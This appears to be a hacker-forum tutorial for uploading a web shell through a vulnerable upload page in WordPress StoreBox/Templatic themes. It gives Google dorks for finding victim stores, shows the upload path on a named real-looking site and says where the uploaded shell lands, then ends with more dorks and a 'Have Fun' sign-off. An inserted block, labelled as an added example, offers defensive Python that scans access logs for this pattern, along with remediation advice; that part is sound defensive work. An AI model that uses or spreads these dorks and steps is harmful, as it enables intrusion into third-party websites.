WordPress StoreBox Shell Upload Vulnerability
[x] Step 1 -> Go to google.com and search with these dorks.
"StoreBox by Templatic" intext:rings
"StoreBox by Templatic" intext:dress
"StoreBox by Templatic" intext:shoes
"StoreBox by Templatic" intext:jacket
"StoreBox by Templatic" intext:jeans
"StoreBox by Templatic" intext:clothes
"StoreBox by Templatic" intext:purse
You can create more dorks of your own like these.
[x] Step 2 -> After you search, pick one result.
Go to the page, right click -> View Page Source (or Ctrl+U). Look for the theme path within the source code.
[x] Step 3 -> Now we have found the theme path:
http://www.mybackpackbuddies.com/wp-content/themes/framework/
Note that the theme is Framework.
Just add /upload/ to the end of the URL, after framework.
It will look like this:
http://www.mybackpackbuddies.com/wp-content/themes/framework/upload/
[x] Step 4 -> You will find an upload option there if the site is vulnerable to this attack.
Here it is.
See the explanation in the picture. The uploader supports the extensions .php / .txt / .html.
[x] Step 5 -> Now find your shell path. Your file path will be here:
/wp-content/uploads/products_img/your file name
As an example, I just uploaded a .txt file there.
http://www.mybackpackbuddies.com/wp-content/uploads/products_img/pwned.txt
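Added example, not part of the original post: a defender-side check that scans a web server access log for the request pattern the steps above leave behind (hits on a theme's /upload/ path, then requests for script or non-image files under /wp-content/uploads/products_img/). It assumes Combined Log Format; the sample lines, IP addresses and file names are constructed, and the list of PHP-handled extensions is an assumption.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip - - [time] "METHOD target HTTP/x" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Uploader location described on the page: /wp-content/themes/<theme>/upload/
UPLOADER_RE = re.compile(r'^/wp-content/themes/[^/]+/upload(/|$)', re.I)
# Destination directory named on the page
DROP_RE = re.compile(r'^/wp-content/uploads/products_img/(.+)', re.I)
# Assumption: names a PHP handler may execute, including "x.php.jpg" forms
SCRIPT_RE = re.compile(r'\.(php\d?|phtml|phar)(\.|$)', re.I)
# Non-image types the page says the uploader accepts
MARKUP_EXT = ('.html', '.htm', '.txt')

def classify(method, target):
    """Return a finding label for one request, or None if it is uninteresting."""
    path = unquote(target.split('?', 1)[0])  # drop query string, undo %-encoding
    if UPLOADER_RE.match(path):
        return 'uploader_post' if method.upper() == 'POST' else 'uploader_probe'
    m = DROP_RE.match(path)
    if m:
        if SCRIPT_RE.search(m.group(1)):
            return 'script_in_uploads'
        if m.group(1).lower().endswith(MARKUP_EXT):
            return 'nonimage_in_uploads'
    return None

def scan(lines):
    """Return (line_no, ip, label, status, chained) per suspicious request."""
    findings, posted = [], set()
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        label = classify(m.group(2), m.group(3)) if m else None
        if label is None:
            continue  # unparsable line or uninteresting request
        ip, status = m.group(1), m.group(4)
        if label == 'uploader_post' and status[0] in '23':
            posted.add(ip)  # this client got a non-error answer from the uploader
        # chained: file request from a client that used the uploader earlier
        chained = label.endswith('_in_uploads') and ip in posted
        findings.append((n, ip, label, int(status), chained))
    return findings

# Constructed sample log (documentation IP ranges, made-up file names)
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/themes/framework/upload/ HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "POST /wp-content/themes/framework/upload/ HTTP/1.1" 200 87 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:00:15 +0000] "GET /wp-content/uploads/products_img/x.php HTTP/1.1" 200 20 "-" "-"',
    '192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-content/uploads/products_img/ring.jpg HTTP/1.1" 200 9000 "-" "-"',
]
print(*scan(SAMPLE), sep='\n')
```

A `script_in_uploads` finding with `chained` set and a 200 status is the one to triage first; on the server side, removing the theme's upload directory and disabling script execution under wp-content/uploads closes the path the log check watches.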
[x] Extra Tips -> If you want more dorks, here they are.
inurl:/wp-content/themes/wpstore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
inurl:/wp-content/themes/framework/chkorder.php?color=
inurl:/wp-content/themes/wpstore/thumb.php?src=
inurl:/wp-content/themes/framework/thumb.php?src=
inurl:/wp-content/themes/eCommerce/thumb.php?src=
inurl:/wp-content/themes/framework/getsubcat.php?q=
Have Fun All...
Thanks to : m0bil3_XT(HF) and MHU H4x0r